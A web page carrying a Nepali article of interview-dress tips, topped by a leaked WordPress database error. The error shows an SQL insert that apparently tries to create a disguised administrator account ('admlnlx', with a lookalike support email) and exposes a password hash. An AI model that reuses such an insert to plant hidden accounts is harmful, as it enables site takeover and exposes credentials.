WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVmF81iFFGv92uVqNh7n27D3wv7xo9.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 02:58:39', '', 'admlnlx', 'admlnlx')
एजेन्सी । अन्तरवार्ता दिन जाँदा के लुगा लगाएर जाने भनेर मानिसहरु चिन्तित हुने गरेको पाइन्छ । अन्तरवार्ता लिने व्यक्तिलाई प्रभाव पार्न अनेकै तरिकाहरु अपनाइए पनि कहिलेकाहीँ त्यो विफल हुनसक्छ । त्यसकारण यस्तो कुनै गल्ती नगर्नुहोस् कि जहाँ तपाईको अात्मविश्वास नगिराअोस् । अावश्यक ज्ञानका साथ तपाईले कुन र कस्तो प्रकारको पहिरन लगाएर अन्तरवार्ता दिन जानु भएको छ, त्यो कुरा पनि त्यत्तिकै महत्वपूर्ण हुन्छ ।
पहिलो इन्टरभ्यूमा रंगीचंगी कपडा नलगाउनुहोला । यसका सट्टा सेतो सर्ट र कालो पाइन्ट बढी प्रभावकारी हुन्छ ।
ठूला ठूला बोल्ड प्रिन्ट भएको लुगा नलगाउनुहोला किनकी इन्टरभ्यूअरलाई तपाईको छवि मन पर्दैन ।
जुनकुनै इन्टरभ्यूमा जाँदा होस् तपाई खैरो बेल्टका साथै छालाको कालो जुत्ताका साथमा प्रस्तुत हुँदा राम्रो । यसमा तपाई संगठित तथा क्लासी देखाउने भास्करमा उल्लेख छ ।
यस्ता कपडा नलगाउनुहोस् कि जुन एकदमै टाइट देखिन्छ । यसले तपाईको पुरा दिन असहज गराउनुका साथै इन्टरभ्यूअरलाई तपाईमाथि गलत इम्प्रेशन पर्न जान्छ ।
जिन्सलाई क्याजुअल ड्रेसमा गनिन्छ । तर यदि तपाई अफिसको कामका लागि इन्टरभ्यू लिन जाँदै हुनुहुन्छ भने साधारण पहिरनमा उपयुक्त हुन्छ । च्यातिएका तथा ग्नन्च पाइन्टले इन्टरभ्यू लिने व्यक्तिमा खराब मानसिकता भरिन सक्छ ।